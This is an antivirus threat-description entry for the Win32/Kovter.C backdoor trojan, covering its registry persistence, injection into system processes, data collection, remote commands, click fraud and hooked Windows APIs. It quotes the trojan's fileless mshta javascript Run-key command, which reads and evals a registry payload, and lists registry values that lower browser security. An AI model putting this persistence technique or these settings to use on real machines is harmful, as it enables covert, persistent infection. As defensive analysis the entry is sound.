Win32/Kovter [Threat Name] go to Threat
Win32/Kovter.C [Threat Variant Name]
| Category | trojan |
| Size | 311860 B |
| Aliases | Trojan.Win32.Kovter.kj (Kaspersky) |
| Trojan.MulDrop6.7552 (Dr.Web) | |
| TR/Kovter.311854 (Avira) |
Short description
The trojan serves as a backdoor. It can be controlled remotely.
Short description
The following Registry entries are set:
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKLM\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKCU\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
- [HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
- "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKLM\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
- [HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
- "0x9a352a44" = "mshta javascript:Wwc4UYPy="q3bAi0T";p3a=new%20ActiveXObject("WScript.Shell");Y5VbU4ym="6fGo";Vuy24U=p3a.RegRead("HKCU\\software\\%variable1%\\%variable2%");yj2AV2YXX="4iWRAuYOY";eval(Vuy24U);QIb3FlghU="tU6";"
- [HKEY_LOCAL_MACHINE\SOFTWARE\%variable1%]
- "%variable2%" = "%javascriptpayload%"
- "%variable3%" = "%malwarepayload%"
- [HKEY_CURRENT_USER\SOFTWARE\%variable1%]
- "%variable2%" = "%javascriptpayload%"
- "%variable3%" = "%malwarepayload%"
This causes the trojan to be executed on every system start.
The trojan may create copies of itself using the following filenames:
- %localappdata%\%variable4%\%variable4%.exe
- %appdata%\%variable4%\%variable4%.exe
- %windows%\%variable4%\%variable4%.exe
- %commonappdata%\Microsoft\%variable4%\%variable4%.exe
A string with variable content is used instead of %variable1-4% .
The trojan may set the following Registry entries:
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "0x9a352a44" = "%malwareinstallpath%"
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "0x9a352a44" = "%malwareinstallpath%"
- [HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
- "0x9a352a44" = "%malwareinstallpath%"
- [HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
- "x9a352a44" = "%malwareinstallpath%"
This causes the trojan to be executed on every system start.
After the installation is complete, the trojan deletes the original executable file.
The trojan launches the following processes:
- regsvr32.exe
- %windir%\System32\regsvr32.exe
- rundll32.exe
- %windir%\System32\rundll32.exe
- explorer.exe
- %windir%\explorer.exe
- %malwarefilepath%
The trojan creates and runs a new thread with its own code within these running processes.
The following Registry entries are set:
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
- "1206" = 0
- "1809" = 3
- "2300" = 0
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
- "1206" = 0
- "1809" = 3
- "2300" = 0
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
- "%malwarefilename%" = 8888
- "iexplore.exe" = 8888
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
- "%malwarefilename%" = 8888
- "iexplore.exe" = 8888
Information stealing
The trojan collects the following information:
- malware version
- operating system version
- information about the operating system and system settings
- language settings
- installed antivirus software
- installed firewall application
- memory status
- CPU information
- list of running processes
- computer name
- user name
The trojan attempts to send gathered information to a remote machine.
Other information
The trojan acquires data and commands from a remote computer or the Internet.
The trojan contains a list of (173) URLs. The HTTP protocol is used.
It can execute the following operations:
- download files from a remote computer and/or the Internet
- run executable files
- send gathered information
- create Registry entries
- stop itself for a certain time period
The trojan sends HTTP requests to simulate clicks on banner advertisements, to inflate web counter statistics etc.
The trojan keeps various information in the following Registry keys:
- [HKEY_LOCAL_MACHINE\SOFTWARE\%variable%]
- [HKEY_CURRENT_USER\SOFTWARE\%variable%]
A string with variable content is used instead of %variable% .
The trojan hooks the following Windows APIs:
- CreateProcessAsUserA (advapi32.dll)
- CreateProcessAsUserW (advapi32.dll)
- CreateProcessWithLogonA (advapi32.dll)
- CreateProcessWithLogonW (advapi32.dll)
- CreateProcessWithTokenA (advapi32.dll)
- CreateProcessWithTokenW (advapi32.dll)
- RegSetValueA (advapi32.dll)
- RegSetValueExA (advapi32.dll)
- RegSetValueExW (advapi32.dll)
- RegSetValueW (advapi32.dll)
- DirectSoundCreate (dsound.dll)
- DirectSoundCreate8 (dsound.dll)
- RectVisible (gdi32.dll)
- CreateProcessA (kernel32.dll)
- CreateProcessW (kernel32.dll)
- OpenProcess (kernel32.dll)
- WinExec (kernel32.dll)
- NtOpenProcess (ntdll.dll)
- NtResumeThread (ntdll.dll)
- NtCreateProcess (ntdll.dll)
- NtCreateProcessEx (ntdll.dll)
- NtSetValueKey (ntdll.dll)
- CoCreateInstance (ole32.dll)
- CoCreateInstanceEx (ole32.dll)
- CoGetClassObject (ole32.dll)
- SHGetFolderPathW (shell32.dll)
- SHGetKnownFolderPath (shell32.dll)
- ShellExecuteA (shell32.dll)
- ShellExecuteExA (shell32.dll)
- ShellExecuteExW (shell32.dll)
- ShellExecuteW (shell32.dll)
- DialogBoxIndirectParamA (user32.dll)
- DialogBoxIndirectParamW (user32.dll)
- DialogBoxParamW (user32.dll)
- GetFocus (user32.dll)
- GetForegroundWindow (user32.dll)
- MessageBoxA (user32.dll)
- MessageBoxExA (user32.dll)
- MessageBoxExW (user32.dll)
- MessageBoxIndirectA (user32.dll)
- MessageBoxIndirectW (user32.dll)
- MessageBoxW (user32.dll)
- PostMessageA (user32.dll)
- SetWindowsHookExA (user32.dll)
- SetWindowsHookExW (user32.dll)
- WindowFromPoint (user32.dll)
- waveOutWrite (winmm.dll)
- HttpOpenRequestA (wininet.dll)
- HttpOpenRequestW (wininet.dll)
- InternetConnectA (wininet.dll)
- InternetConnectW (wininet.dll)
- InternetReadFile (wininet.dll)
- getaddrinfo (ws2_32.dll)
- GetAddrInfoExA (wsock32.dll)
- GetAddrInfoExW (wsock32.dll)
- GetAddrInfoW (wsock32.dll)